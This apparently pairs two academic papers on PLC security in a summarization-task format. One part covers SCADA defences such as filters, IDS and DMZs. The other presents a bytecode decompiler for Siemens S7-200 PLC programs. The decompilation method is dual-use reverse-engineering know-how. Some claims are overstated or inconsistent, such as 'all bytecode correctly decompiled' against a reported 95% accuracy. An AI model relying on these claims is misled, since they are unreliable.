Consider a scenario where an attacker succeeds in compromising an MTU of the process network.
The attacker may then be able to capture the private key of the compromised device and use it to sign a malicious packet, which will look like a valid packet at the destination since it is signed correctly. As a result, the authentication mechanism may not provide the intended protection when a master device is compromised. This issue can be addressed by introducing a set of filtering units between the MTUs and the field devices of the process network. These filtering units fall into two main categories according to their functionality: signature-based filters and critical-state detection filters. Signature-based filters use a predetermined set of known attack patterns (signatures) and check for any signature in the packets passing through the filter. A critical state is an unwanted state of an industrial process which can lead to a system failure or otherwise violate the safety limits of the process; such states are common in any industrial system. The task of critical-state filters is therefore to determine, by examining packet contents, whether any packet passing through could lead to a critical state.

C. Intrusion Detection Systems

An attacker can seek access to the SCADA network in several ways, selecting the most vulnerable location in the network: either a host or a high-level device. Once a device is infected, the intrusion should be detected. For this, an Intrusion Detection System (IDS) can be used. An IDS is a set of tools and processes providing network monitoring, which gives the network administrator the opportunity to analyze the network traffic and detect any unauthorized or unusual activity within the network. IDSs are usually deployed at an ingress or egress point of the network; the connectivity point of critical network devices is another suitable location. An IDS is capable of monitoring network traffic without impacting it.
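The critical-state filter described in the previous subsection reduces, in its simplest form, to a bounds check on the values a packet would write into the process. A toy sketch follows; the register map and safety limits are invented for illustration.

```python
# Toy critical-state filter: before forwarding a write command to a field
# device, check whether the value it carries would push the process outside
# its safety limits. Register addresses and limits are hypothetical.

SAFETY_LIMITS = {0x0010: (0, 120)}   # e.g. a pressure-setpoint register, in bar

def filter_write(register: int, value: int) -> bool:
    """Return True if the packet may pass, False if it must be dropped."""
    if register not in SAFETY_LIMITS:
        return True                  # no critical state known for this register
    lo, hi = SAFETY_LIMITS[register]
    return lo <= value <= hi

assert filter_write(0x0010, 80) is True    # normal setpoint: forwarded
assert filter_write(0x0010, 500) is False  # would exceed safety margin: dropped
```

Because the check depends only on the process state a packet would cause, it blocks a correctly signed packet from a compromised MTU just as readily as an unsigned one.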
Two types of detection are used in IDSs: signature-based IDS and statistical-anomaly-based IDS. In signature-based systems, the IDS compares the collected traffic data with a predefined set of rules, or signatures. Every malicious process has its own signature; once it is determined, an IDS can detect the process and wipe it off the network. Because of their easy implementation, signature-based systems are more popular in the vendor community. For this method to succeed, however, the signature of every piece of malware produced must be included in the IDS, which is impractical: identifying the Stuxnet malware took more than a year, and its origin is still unknown. Signature-based IDSs therefore do not provide protection against new malware whose signatures are unknown and cannot yet be programmed into the IDS. An anomaly-based IDS can detect any abnormal process occurring inside the network by comparing a number of traffic parameters, such as port numbers, data payloads, bandwidth and protocols, against their normal values. Once an anomaly is detected, the IDS alerts the system administrator and the firewall and sends information about the anomaly, so the administrator can prevent the malware attack. This method of intrusion detection is effective against all malware produced to date. An IDS may also include an Intrusion Prevention System (IPS), whose function is to reset the connection and reprogram the firewall so that the network blocks the traffic corresponding to the malicious process; this can be considered another application-layer firewall. A system which includes both detection and prevention is called an Intrusion Detection and Prevention (IDP) system. Even when such systems are installed in a SCADA system, they must be properly updated, monitored and
validated; otherwise they will not be effective against the most current malicious processes.

D. Creating Demilitarized Zones (DMZ)

DMZs are logical sub-networks inside a large network which separate the untrusted segment (the Internet) from the main network, allowing the network administrator to deploy an additional layer of security: an attacker will have access only to the untrusted part of the network. Here, the whole network is segmented into multiple zones (External, Corporate, Data, Control and Safety) and each zone is firewall-protected. This prevents a threat from propagating to the whole network once it infects one partition. Multiple DMZs have proved effective in large network architectures.

E. Best Practices for Securing PLC Systems

Several best practices can aid in preventing harmful security attacks on PLC systems. A strong user-account management policy should be used: strong passwords should be applied wherever possible, and all unused accounts, along with default accounts, should be disabled. The process network and the Internet should not be connected directly, and PLC programming machines should be connected to the PLCs only while they are being programmed. Access to the control network through the intranet should be controlled and monitored. Remote control of devices and maintenance activities should follow a secure methodology that minimizes the possibility of an infection. The use of external drives such as USB sticks should be limited among users in order to prevent infection.

VI.
CONCLUSIONS

In this paper we have focused on revealing the vulnerabilities of PLC-based SCADA systems and how those vulnerabilities can affect the critical infrastructure of common real-world applications. PLCs are used as the low-level controlling devices in large ICSs, and attackers have attempted to take control of such PLC-based systems ever since they were introduced. An attacker must infect the computer that governs a PLC in order to control it, so the security of the governing computers in a PLC-based system is vital. The vulnerabilities of the process network are similar to those of an ICT network, except that the process network is isolated from the outside network; an infection can occur either through USB drives or through the intranet, so securing such exposed points of the network grants overall protection to the system. Several methods can be adopted to protect a PLC system. The most vulnerable area in PLC systems is the lack of security in the communication protocols, so enhancing the security of these protocols is very important. In addition, filtering methods, firewalls, IDSs and DMZs can be introduced to strengthen the overall security. Adopting all these methods at the same time is impractical: it would degrade the performance of the overall system, and the adaptation would not be economically beneficial. An effective combination of such methods should be chosen depending on the vulnerabilities and the architecture (which varies by vendor) of the system to be protected. The existing security policies do not provide complete protection for a PLC system. The deployment of firewalls alone is not sufficient to stop infections; a complex worm like Stuxnet can easily bypass a firewall without a trace. An IDS should be deployed alongside a firewall in order to prevent infections from gaining access. Filtering methods allow the detection of state changes and signatures.
The network can be designed according to DMZs. The future of PLC systems looks bright thanks to the attention given by the scientific community over the last few years. PLC designers and programmers should focus on security aspects under the supervision of security experts. Finding better solutions that provide adequate security without excessively degrading performance is an interesting area for future work.
Summary:
Programmable Logic Controllers (PLCs) are among the most important components embedded in Industrial Control Systems (ICSs). ICSs have achieved high standards of efficiency and performance, and as a result a large portion of industrial infrastructure has been automated for the comfort of human beings. Protection of such systems is therefore crucial: it is important to investigate the vulnerabilities of ICSs in order to counter the threats and attacks against critical infrastructure and to protect human lives and assets. The PLC is the basic building block of an ICS; if PLCs are exploited, the overall system is exposed to the threat. Many believed that PLCs were secure devices due to their isolation from the external networks of the system, but attacks such as Stuxnet have proven such thinking incorrect. In this paper we have revealed the vulnerabilities of PLCs through a variety of attack vectors which could affect the related critical infrastructure. Furthermore, we have proposed solutions for such weaknesses in PLC-based systems.
Summarize:
Keywords programmable logic controller; bytecode; decompilation; mapping rules.

I. INTRODUCTION

The programmable logic controller (PLC) is widely used as terminal control equipment in industrial control systems (ICSs) and plays a central role in the whole system. With various software and hardware techniques from IT systems applied to ICSs, ICSs are suffering from more and more cyber threats, and physical isolation alone will not prevent an ICS from being attacked. In recent years, ICS cyber-security incidents have emerged in an endless stream [1-3], forcing researchers to focus on ICS security. In 2010, the Stuxnet [4] worm was detected to have invaded the Bushehr nuclear power station in Iran and to have caused severe impact. Stuxnet ultimately destroyed centrifuges by infecting PLCs and controlling the speed of the centrifuges; this clearly shows that PLCs can be attacked and maliciously exploited. Thankfully, the security of PLC programs is receiving more and more attention [5-8]. Model checking [9] is a frequently used method for the formal verification of PLC programs [10-12], but it can only handle source code, not binary code, so we cannot determine whether the running program is infected. Industrial intrusion-detection [13-16] technology also has limitations in dealing with complicated intrusions such as advanced persistent threats (APTs). Therefore, it is necessary to gain deep insight into the binary code of PLC programs. It is hard to analyze the bytecode directly; it would be much easier if the bytecode were first decompiled. Decompilation has wide usage in IT systems, while in ICSs, as little attention was paid to security in the early days, there are few related studies. This paper proposes a technique for bytecode decompilation of PLC programs. Since PLCs of various brands have different architectures and instruction sets, we take Siemens S7-200 series PLCs as our research objects.
The target language of the decompilation is STL, a programming language supported by Siemens S7-200 series PLCs. The remainder of this paper is organized as follows. Section 2 presents a brief introduction to PLC programming languages. Section 3 gives a detailed analysis of the mapping rules between S7-200 instructions and the corresponding bytecode. In Section 4 we provide a decompilation framework, introduce the instruction template and operand template, and present some algorithms. Section 5 evaluates the presented framework by decompiling several PLC programs, with the results shown in a table. Finally, Section 6 concludes the paper.

II. OVERVIEW OF PLC PROGRAMMING LANGUAGES

User programs for PLCs are designed by programmers according to the process-control requirements, using specific PLC programming languages. In accordance with the industrial-control programming-language standard IEC 1131-3 [17], established by the International Electrotechnical Commission (IEC), PLC programming languages include Ladder Diagram (LD), Sequential Function Chart (SFC), Function Block Diagram (FBD), Instruction List (IL), and Structured Text (ST). Different kinds of PLCs support different programming languages; for example, Siemens S7-200 series PLCs support LAD, STL and FBD. STL is somewhat similar to assembly language. An STL instruction includes two parts, a mnemonic and an operand; here are some examples: LD I0.0; A I0.1; = Q1.0. The S7-200 manual [18] defines a total of 246 mnemonics, which compose 19 classes of instructions, such as bitwise logical instructions, clock instructions, comparison instructions and transformation instructions. An operand is composed of an operand sign and parameters. The operand sign can be further divided into a master sign and an auxiliary sign: the master sign decides in which storage region the operand is stored, the auxiliary sign defines the operand size, and the parameters decide the exact location of the operand.
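The operand structure just described (master sign, optional auxiliary sign, dot-separated location parameters) can be captured by a small parser. This is a toy sketch modeling only a few signs; the full S7-200 operand grammar is richer.

```python
# Toy parser for the STL operand syntax described above.
import re

OPERAND_RE = re.compile(
    r"^(?P<master>SM|I|Q|S|T|V|M|L|AC)"   # master sign: storage region
    r"(?P<aux>[XBWD])?"                   # auxiliary sign: operand size (optional)
    r"(?P<byte>\d+)"                      # byte/word/dword number
    r"(?:\.(?P<bit>\d+))?$"               # bit number (optional)
)

def parse_operand(text: str) -> dict:
    """Split an operand like I10.1 or VB255 into its fields."""
    m = OPERAND_RE.match(text)
    if m is None:
        raise ValueError(f"not a recognized operand: {text}")
    return {k: v for k, v in m.groupdict().items() if v is not None}

print(parse_operand("I10.1"))   # {'master': 'I', 'byte': '10', 'bit': '1'}
print(parse_operand("VB255"))   # {'master': 'V', 'aux': 'B', 'byte': '255'}
```

The same decomposition (region, size, location) is what Sec. III-D later recovers from the binary OperandCode.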
The master signs include I, Q, S, SM, T, and so on, and the auxiliary signs are X (bit), B (byte), W (word) and D (dword). (978-1-4673-8979-2/17/$31.00 2017 IEEE)

III. MAPPING RULES BETWEEN INSTRUCTION AND BYTECODE

The relationship between the instruction set and the corresponding bytecode set is a one-to-one mapping. Suppose INSS denotes the instruction set, BCS denotes the bytecode set, and f is the mapping function from INSS to BCS. Then: ∀ Instruction ∈ INSS, ∃ ByteCode ∈ BCS s.t. ByteCode = f(Instruction); and ∀ ByteCode ∈ BCS, ∃ Instruction ∈ INSS s.t. Instruction = f⁻¹(ByteCode). To work out the mapping function f, we need to know the instruction set and the corresponding bytecode set of the target PLC. The instruction set can be found in the manual, while extracting the bytecode set requires some effort.

Fig. 1. NOP instruction and the corresponding bytecode

A. Start Position Determination of the Code Segment

The bytecode file is the executable file of the PLC and is organized according to a certain structure, in which the instruction bytecode is located in the code segment and the data in the data segment. Since the structure of the bytecode file is unknown, it is necessary to determine the start position of the code segment. The no-operation (NOP) instruction is a PLC instruction that performs no operation, and is therefore suitable for this task.

Fig. 2. An example of the NOP-division method (the instruction sequence NOP 0; LDN M0.0; NOP 0; TON T33,100; NOP 0; LDW>= T33,40; NOP 0; = Q0.1; NOP 0; LD T33; NOP 0; = M0.0; NOP 0 and its compiled bytecode)

First, we write a source program containing only 4 consecutive NOP instructions and, after compilation, extract the bytecode file.
Obviously, the bytecode file should then contain 4 consecutive, identical bit sequences; we find them in a binary editor, as shown in figure 1. The bytecode file includes 4 consecutive occurrences of the sequence FF 00, which shows that FF 00 is the bytecode corresponding to the instruction NOP 0, and that the start position of the code segment is where the first FF 00 sequence is located.

B. Bytecode Extraction

Through observation we find that the instruction storage order is the same as that of the corresponding bytecode. Clearly, if the start position of the first instruction's bytecode and the size of each instruction's bytecode are known, it is easy to extract all the bytecode. However, instruction sizes are not always the same. To solve this problem, we propose a NOP-division method to extract batches of instruction bytecode. The NOP-division method employs NOP instructions to divide the other instructions, so we can determine the start and end positions of each instruction's bytecode from the bit sequences of the NOP instruction. As shown in figure 2, we adopt the NOP-division method to extract the bytecode corresponding to some instructions, such as LDN M0.0, TON T33,100, etc.

Fig. 3. INVB-formed instructions and the corresponding InsCodes:
INVB VB255 -> 11110100 00001100 10000000 11111111
INVB LB0   -> 11110100 00001100 11100000 00000000
INVB LB15  -> 11110100 00001100 11100000 00001111
INVB LB63  -> 11110100 00001100 11100000 00111111
INVB AC0   -> 11110100 11001100
INVB AC1   -> 11110100 11011100
INVB IB0   -> 11110100 00001100 00000000 00000000

C. Mnemonic Mapping Rules

Each STL instruction has exactly one mnemonic, but may have several operands. For convenience, in this paper we use InsCode to denote the bytecode corresponding to an instruction, OpCode to denote the bytecode corresponding to the mnemonic, and OperandCode to denote the bytecode corresponding to the operand. To determine the OpCode, we fix the mnemonic and change the operands in one experiment.
In this way, we can be sure that the unchanged part of the InsCode is the OpCode, and the remainder is the OperandCode. For a specific mnemonic, we change the operands to construct some instructions, extract the InsCodes using the NOP-division method, and then analyze the mapping rules of the mnemonic. Since instructions differ in their number of operands, we discuss the problem in three cases: instructions with no operand, instructions with one operand, and instructions with several operands.

(1) Instructions with no operand. For instructions with no operand, the InsCode equals the OpCode. For example, the InsCode of the instruction EU is 11100001, and the OpCode is also 11100001.

(2) Instructions with one operand. For instructions with one operand, we change the operand in one experiment and study the changes in the InsCode. Take the mnemonic INVB for instance: we construct some instructions and extract the InsCodes, with the result shown in figure 3. We can see that the first byte of all the InsCodes is the same, so we conclude that the OpCode of INVB is 11110100.

(3) Instructions with several operands. For instructions with several operands, using a method similar to the second case, we change only one operand in one experiment; the part of the InsCode that never changes is the OpCode.

D. Operand Mapping Rules

It is more difficult to analyze the operand mapping rules, due to the various operand kinds and the uncertain number of operands. The operand kinds of S7-200 PLCs include immediate data, strings and memorizers. For immediate and string operands, S7-200 PLCs adopt a direct coding strategy, so by directly decoding the OperandCode we can easily obtain the operands; we therefore discuss only memorizer operands in this paper.
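The experiments of Secs. III-B and III-C can be sketched together: split a code segment on the NOP bytecode to recover per-instruction InsCodes, then intersect the InsCodes of one mnemonic to infer its OpCode. The naive split assumes FF 00 never occurs inside another instruction's bytecode, which the NOP-division layout is designed to guarantee.

```python
# Sketch of NOP-division extraction plus OpCode inference.

NOP = b"\xff\x00"  # bytecode of "NOP 0", as determined in Sec. III-A

def nop_division(code_segment: bytes) -> list[bytes]:
    """Recover the InsCode of each NOP-separated instruction."""
    return [chunk for chunk in code_segment.split(NOP) if chunk]

def infer_opcode(inscodes: list[bytes]) -> bytes:
    """Leading bytes identical across all samples form the OpCode candidate."""
    opcode = bytearray()
    for position in range(min(len(c) for c in inscodes)):
        byte_set = {c[position] for c in inscodes}
        if len(byte_set) != 1:   # first differing byte: operand coding begins
            break
        opcode.append(byte_set.pop())
    return bytes(opcode)

# InsCodes of some INVB instructions from Fig. 3
invb_samples = [
    bytes([0b11110100, 0b00001100, 0b10000000, 0b11111111]),  # INVB VB255
    bytes([0b11110100, 0b11001100]),                          # INVB AC0
    bytes([0b11110100, 0b00001100, 0b00000000, 0b00000000]),  # INVB IB0
]
print(infer_opcode(invb_samples))  # b'\xf4' == 11110100, matching Sec. III-C
```

With variable-length InsCodes, the comparison runs only up to the shortest sample, which is exactly why the paper fixes the mnemonic and varies the operands within one experiment.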
Memorizer operands contain a memorizer symbol and a byte (word, or dword) number, and may also contain a bit number when the second field is a byte number. For example, operand I10.1 contains memorizer symbol I, byte number 10, and bit number 1. If an instruction contains only one operand, the OperandCode is the remainder of the InsCode after the OpCode. For instance, the InsCode of instruction INVB VB255 is as follows:

INVB VB255 -> 11110100 00001100 10000000 11111111

From the previous discussion we know the OpCode of INVB is 11110100; therefore the gray part of the InsCode identifies the OperandCode of operand VB255. For instructions with multiple operands, fix one operand and the mnemonic and change the other operands in one experiment; the unchanged part other than the OpCode corresponds to the fixed operand. During our research we find that the operand type is defined by a field whose size may be 4 bits, 1 byte, or 2 bytes, which we denote as OperandType. Taking the instruction LDB= IB0, IB0 as an example, its InsCode is 10010001 00000000 00000000 00000000 00000000 00000000; the gray part is the OperandType of the first operand IB0. To confirm an OperandType, a lot of experiments are needed. The OperandType 0000 indicates that the memorizer symbol is one of I, Q, M, S, SM, V, and L. The size of the OperandType is related to the operand type and the operand number. The memorizer symbol, byte (word, or dword) number, and bit number all map to specific fields in the OperandCode. In this paper, we employ masks to represent the positions of these fields in the InsCode, and by an AND operation we can obtain the corresponding coding. For example, byte number coding (ByteNC) = OperandCode & byte number coding mask (ByteNCM). Through the ByteNC we can uniquely determine the byte number. The word (or dword) number and bit number can be determined in the same way. If the bit number does not exist, then the bit number coding mask (BitNCM) is NULL.

IV.
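The mask arithmetic (ByteNC = OperandCode & ByteNCM) can be sketched directly. The 16-bit layout assumed here (top nibble carries the memorizer-symbol coding, low 12 bits the byte number) is our reading of the INVB VB255 encoding above, whose OperandCode 10000000 11111111 then yields byte number 255:

```c
#include <stdint.h>

/* Assumed masks for a 16-bit OperandCode: top nibble = memorizer symbol
 * coding, low 12 bits = byte number coding (ByteNCM). */
enum { SIGN_NC_MASK = 0xF000, BYTE_NC_MASK = 0x0FFF };

/* Symbol coding: OperandCode & OSCM. */
uint16_t sign_coding(uint16_t operand_code)
{
    return operand_code & SIGN_NC_MASK;
}

/* ByteNC = OperandCode & ByteNCM, which uniquely determines the byte
 * number. */
uint16_t byte_number(uint16_t operand_code)
{
    return operand_code & BYTE_NC_MASK;
}
```

For INVB VB255 the OperandCode 0x80FF gives byte number 0x0FF = 255; for INVB IB0 the OperandCode 0x0000 gives byte number 0.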
INSCODE DECOMPILATION FRAMEWORK

As previously described, STL is similar to an assembly language, so decompiling STL programs can be inspired by disassembly algorithms. Classical disassembly algorithms mainly include the linear scanning algorithm [18] and the recursive traversal algorithm [19]. The linear scanning algorithm disassembles instructions one after another from the first byte. During disassembly, the size of each instruction is calculated and used to determine the start position of the next instruction. It can cover the whole code segment but does not consider the case where data is mixed into the code. The recursive traversal algorithm, by contrast, disassembles instructions according to how they are referenced; it can separate code and data, yet it is more complicated than the first one. Since data and code are separated in a PLC bytecode file, we adopt the linear scanning algorithm for the sake of simplicity. The steps are as follows.

(1) Position pointer IpStart points to the start of the code segment.
(2) Attempt to match an instruction form where IpStart points to, and obtain the instruction size n.
(3) If step (2) succeeds, decompile the n bytes after where IpStart points to; if it fails, exit.
(4) Assign IpStart + n to IpStart.
(5) Judge whether the value of IpStart is beyond the end of the code segment; if not, go to step (2).

Step (3) is the kernel of the whole system; it decompiles each piece of InsCode. To facilitate InsCode decompilation, we present an instruction template and an operand template, upon which some decompiling algorithms are also designed. The InsCode decompilation framework is shown in figure 4.

Fig. 4. InsCode decompilation framework.

The framework can be divided into two parts: mnemonic resolution and operand resolution.
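The five-step linear scan above can be sketched as a short loop. The 2-byte-NOP (FF 00) / 4-byte-otherwise sizing rule below is only a stand-in stub for the real template matching of step (2):

```c
#include <stddef.h>

/* Stand-in for step (2): a hypothetical sizing rule where a NOP (FF 00)
 * is 2 bytes and every other instruction is 4 bytes.  A real scanner
 * would match against the instruction templates instead. */
static size_t match_size(const unsigned char *p, size_t remaining)
{
    if (remaining >= 2 && p[0] == 0xFF && p[1] == 0x00)
        return 2;
    return remaining >= 4 ? 4 : 0;           /* 0 = match failed */
}

/* Linear scan over the code segment; returns the number of instructions
 * visited. */
size_t linear_scan(const unsigned char *code, size_t len)
{
    size_t ip = 0, count = 0;                /* ip plays IpStart */
    while (ip < len) {                       /* step (5) */
        size_t n = match_size(code + ip, len - ip);  /* step (2) */
        if (n == 0)
            break;                           /* step (3): match failed, exit */
        /* step (3): decompile code[ip .. ip+n) here */
        ip += n;                             /* step (4) */
        count++;
    }
    return count;
}
```

On the byte string FF 00, F4 0C 80 FF, FF 00 the stub yields three instructions: NOP, a 4-byte instruction, NOP.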
First, it resolves the mnemonic on the basis of the instruction template library and algorithm 1 and obtains a pointer to the current instruction template. Then it gains the OperandType of all operands through algorithm 2. Finally, it resolves the operands depending on the OperandType, the operand template library, and algorithm 3. The resolved mnemonic and operands make up a complete instruction.

A. Instruction Template

We place all the instructions that have the same mnemonic into one category, called an instruction class. For every instruction in an instruction class, we use the same structure to describe them, which we call an instruction template. The instruction template contains information about the mnemonic and the operands. The mnemonic information includes the mnemonic type, OpCode, OpCode mask, and so on. The OpCode can be obtained through an AND operation between the OpCode mask and the InsCode. The operand information includes the operand number, the OperandType mask list, the start position of the OperandCode in the InsCode, etc., where the OperandType mask list contains all the OperandType masks. An OperandType can be obtained by an AND operation between an OperandType mask and the InsCode. The data structure of the instruction template is as follows.

struct Ins {
    string Mnemonic;         // the mnemonic type
    int OpCode;              // the OpCode
    long long OpMask;        // the OpCode mask
    int OperandNum;          // the operand number
    OperandTypeMask *OperandTypeMask; // pointer to the OperandType mask list
    int Pos;                 // start position of the OperandCode
    Ins *Ptr;                // pointer to the next instruction template
};

Within struct Ins, the OperandTypeMask is defined as follows.

struct OperandTypeMask {
    long long Mask;          // the OperandType mask
    OperandTypeMask *ptr;    // pointer to the next list node
};

Take the mnemonic LDB= for example; its instruction template is described in table 1.
Algorithm 1: INSTRUCTION TEMPLATE BASED MNEMONIC RESOLUTION
Input: InsCode
Output: Mnemonic, InsPtr
Begin
1  CurrentIns = InstHead  // CurrentIns points to the head of the instruction template list
2  while CurrentIns != NULL do
3      tmpOpcode = InsCode & CurrentIns->OpMask;
4      if tmpOpcode == CurrentIns->OpCode then  // match success!
5          Mnemonic = CurrentIns->Mnemonic;
6          InsPtr = CurrentIns;
7          break;
8      end if
9      CurrentIns = CurrentIns->Ptr;
10 end while
End

B. Operand Templates

In this paper all operands that have the same operand sign are grouped into one class, and we use an operand template to describe them. Since the same operand may have a different coding style after different mnemonics, we have to build one template for every mnemonic, which takes a lot of time. An operand template contains the operand sign, the operand sign coding mask (OSCM), the operand sign coding (OSC), etc. The OSC can be obtained by an AND operation between the OSCM and the OperandCode; the byte number and bit number can be obtained in the same way. Operand templates are organized as a list, whose node is structured as follows.

struct Operand {
    string Sign;     // the operand sign
    int SignMask;    // the OSCM
    int SignCode;    // the OSC
    int ByteMask;    // byte (word/dword) number mask
    int BitMask;     // bit number mask
    Operand *ptr;    // pointer to the next operand template
};

Take the operand sign IB as an example; its operand template is described in table 2.

Algorithm 2: OBTAIN THE Nth OperandType
Input: InsPtr, InsCode, n
Output: OperandType
Begin
1  P = InsPtr->OperandTypeMask;
2  i = 0;
3  while i < n do
4      P = P->ptr;
5      i++;
6  end while
7  OperandType = InsCode & P->Mask;
End

C. Decompilation Process

On the basis of the proposed templates, we present a template-based decompilation technique. In this section, we introduce the decompilation process with the aid of some algorithms. The process mainly includes two parts: mnemonic resolution and operand resolution.
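Algorithm 1 can be made runnable with a fixed-width InsCode. This minimal sketch assumes 32-bit InsCodes with a one-byte OpCode field in the top byte; the INVB OpCode 0xF4 and the INVB VB255 InsCode 0xF40C80FF come from figure 3, while the mask width is our assumption:

```c
#include <stdint.h>

struct Ins {
    const char *Mnemonic;   /* the mnemonic type */
    uint32_t OpCode;        /* the OpCode, pre-shifted into its field */
    uint32_t OpMask;        /* the OpCode mask */
    struct Ins *Ptr;        /* pointer to the next instruction template */
};

/* Algorithm 1: walk the template list, AND the InsCode with each node's
 * mask, and compare the result with the node's OpCode. */
const char *resolve_mnemonic(uint32_t inscode, struct Ins *head,
                             struct Ins **insptr)
{
    for (struct Ins *cur = head; cur != 0; cur = cur->Ptr)
        if ((inscode & cur->OpMask) == cur->OpCode) {  /* match success! */
            *insptr = cur;
            return cur->Mnemonic;
        }
    *insptr = 0;
    return 0;                                          /* no template matched */
}

/* One-node demo list holding the INVB template. */
const char *demo_resolve(uint32_t inscode)
{
    static struct Ins invb = { "INVB", 0xF4000000u, 0xFF000000u, 0 };
    struct Ins *p;
    return resolve_mnemonic(inscode, &invb, &p);
}
```

Feeding in the InsCode of INVB VB255 (0xF40C80FF) matches the INVB node; any InsCode with a different top byte falls off the end of the list and returns NULL.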
Algorithm 3: OPERAND RESOLUTION
Input: InsPtr, OperandCode, OperandType
Output: OperandSign, OperandByte, OperandBit
Begin
1  Ptr = Select(OperandType);  // choose an operand template according to the OperandType; function Select() returns the head pointer of the operand template list
2  while Ptr != NULL do
3      tmpCode = OperandCode & Ptr->SignMask;
4      if tmpCode == Ptr->SignCode then  // match success!
5          OperandSign = Ptr->Sign;      // resolve the operand sign
6          OperandByte = OperandCode & Ptr->ByteMask;  // extract the byte (word/dword) number
7          OperandBit = OperandCode & Ptr->BitMask;    // extract the bit number
8          break;
9      end if
10     Ptr = Ptr->ptr;
11 end while
End

1) Mnemonic Resolution

We perform mnemonic resolution using algorithm 1. Algorithm 1 takes a piece of InsCode as input and outputs the mnemonic type and a pointer. It traverses the instruction template list and, for each node, performs an AND operation between the InsCode and the OpCode mask CurrentIns->OpMask, then compares the result with CurrentIns->OpCode. If they are consistent, it assigns the current pointer to InsPtr and exits; CurrentIns->Mnemonic is the corresponding mnemonic type, and we can use InsPtr to find the matching instruction template and then resolve the InsCode. Otherwise, it continues to traverse the next node.

2) Operand Resolution

After mnemonic resolution, we can obtain some operand information stored in the instruction template. The parameter InsPtr->OperandNum indicates the number of operands that the source instruction has; if it equals zero, the source instruction has no operand, and there is no need for operand resolution. Otherwise, we go on.
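Algorithm 3 can be sketched in the same style. The IB node's values follow the IB operand template given in the paper (OSCM F000, OSC 00, ByteNCM 0FFF, BitNCM NULL); the V sign coding 0x8 is only inferred from the INVB VB255 encoding and should be treated as an assumption:

```c
#include <stdint.h>

struct Operand {
    const char *Sign;     /* the operand sign */
    uint16_t SignMask;    /* the OSCM */
    uint16_t SignCode;    /* the OSC */
    uint16_t ByteMask;    /* byte (word/dword) number mask */
    uint16_t BitMask;     /* bit number mask; 0 stands for NULL */
    struct Operand *ptr;  /* next operand template */
};

/* Algorithm 3: find the node whose sign coding matches, then extract the
 * byte and bit numbers with that node's masks.  Returns the sign or 0. */
const char *resolve_operand(uint16_t code, struct Operand *head,
                            uint16_t *byte_no, uint16_t *bit_no)
{
    for (struct Operand *p = head; p != 0; p = p->ptr)
        if ((code & p->SignMask) == p->SignCode) {     /* match success! */
            *byte_no = code & p->ByteMask;
            *bit_no  = code & p->BitMask;
            return p->Sign;
        }
    return 0;
}

/* Two-node demo list: IB (per the paper's operand template example) and
 * VB (sign coding inferred from INVB VB255). */
static struct Operand vb = { "VB", 0xF000, 0x8000, 0x0FFF, 0, 0 };
static struct Operand ib = { "IB", 0xF000, 0x0000, 0x0FFF, 0, &vb };

const char *demo_sign(uint16_t code)
{
    uint16_t b, t;
    return resolve_operand(code, &ib, &b, &t);
}

uint16_t demo_byte(uint16_t code)
{
    uint16_t b = 0, t;
    resolve_operand(code, &ib, &b, &t);
    return b;
}
```

With the OperandCode 0x80FF of INVB VB255, the VB node matches and the byte number 255 falls out of the ByteNCM mask.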
To resolve an operand, the first thing to do is to obtain the OperandType; this is done through an AND operation between the InsCode and the OperandType mask, the latter acquired from the instruction template. Algorithm 2 shows how to obtain the nth OperandType. When we have gained all the OperandTypes, for every operand we choose an operand template that matches its OperandType, then traverse the template list and look for the node that is in accordance with the OperandCode. If we find a matching node, we stop traversing and use that node to resolve the operand; if not, we continue to the next node. The kernel of operand resolution is shown in algorithm 3. The operand sign, byte (word/dword) number, and bit number make up a complete operand. Algorithm 3 may be employed several times since there may be more than one operand.

TABLE I. AN EXAMPLE OF A MNEMONIC TEMPLATE
Members    | Description                       | Value
Mnemonic   | Mnemonic type                     | LDB=
OpCode     | OpCode                            | 91
OpMask     | OpCode mask                       | F00000000000
OperandNum | Operand number                    | 2
Pos        | Start position of the OperandCode | 16

TABLE II. AN EXAMPLE OF AN OPERAND TEMPLATE
Members  | Description                          | Value
Sign     | Operand sign                         | IB
SignMask | Operand sign coding mask (OSCM)      | F000
SignCode | Operand sign coding (OSC)            | 00
ByteMask | Byte (word/dword) number coding mask | 0FFF
BitMask  | Bit number coding mask (BitNCM)      | NULL

TABLE III. DECOMPILING RESULTS OF 11 PLC PROGRAMS
Name                     | Instruction number | Code coverage /% | Accuracy /% | Time consumed /ms
Gas transmission         | 3688 | 100 | 95  | 51.7
Fountain                 | 39   | 100 | 100 | 0.58
Manipulator              | 91   | 100 | 100 | 1.28
Traffic lights           | 71   | 100 | 100 | 1.03
Three-phase asynchronous | 164  | 100 | 100 | 2.43
Water tower              | 37   | 100 | 100 | 0.56
Tower light              | 83   | 100 | 100 | 1.16
Four-layer elevator      | 613  | 100 | 100 | 9.13
Liquid mixing            | 46   | 100 | 100 | 0.69
Mail sorting             | 232  | 100 | 100 | 3.29
Rolling mill             | 36   | 100 | 100 | 0.58

V. DECOMPILATION EXPERIMENTS

To validate the efficiency of the proposed framework and algorithms, we have conducted several experiments.
However, there is a problem: no classical testing program exists for Siemens PLCs, nor for other manufacturers; indeed, we have not found similar work up till now. Consequently, we instead conduct decompilation experiments on 11 programs from the internet [20]; the results are shown in table 3. The configuration of the testing platform is an Intel(R) Core(TM) i7-4710Q CPU @ 2.5 GHz with 8.00 GB RAM. As we can see, the code coverage is 100% for every program, and the decompilation accuracy is 100% for all but the largest program; this shows that almost all the InsCode has been correctly decompiled and suggests that the linear scanning algorithm is suitable for PLC bytecode decompiling. These results can mainly be attributed to the rather simple structure of PLC bytecode and its uncomplicated coding strategy. The total number of instructions is 5100, and the total processing time is 72.43 milliseconds; thus, the average processing time per piece of InsCode is 0.0142 milliseconds. We are unable to benchmark this efficiency against other work, as we cannot find a team doing the same work, but apparently it would take only a few seconds even for a big program containing thousands of instructions, so the result is acceptable given our understanding that PLC programs are usually small.

VI.
CONCLUSION

The security of PLC programs is very important to the whole industrial control system, while current security strategies are limited in dealing with infected PLC programs. Decompilation of PLC programs helps with their security analysis. Our proposed framework achieves an acceptable time consumption, and all the bytecode has been correctly decompiled, which shows that the linear scanning algorithm is well suited to the decompilation of PLC programs. However, since the decompilation framework stores its information in instruction templates and operand templates organized as lists, its space efficiency is less satisfactory. The framework also works for other kinds of PLCs, but the templates must be newly designed and the data structures adjusted accordingly.

REFERENCES
[1] M. Cheminod, L. Durante, and A. Valenzano, "Review of Security Issues in Industrial Networks," IEEE Transactions on Industrial Informatics, vol. 9, no. 1, pp. 277-293, 2013.
[2] P. Jie and L. Li, "Industrial Control System Security," pp. 156-158.
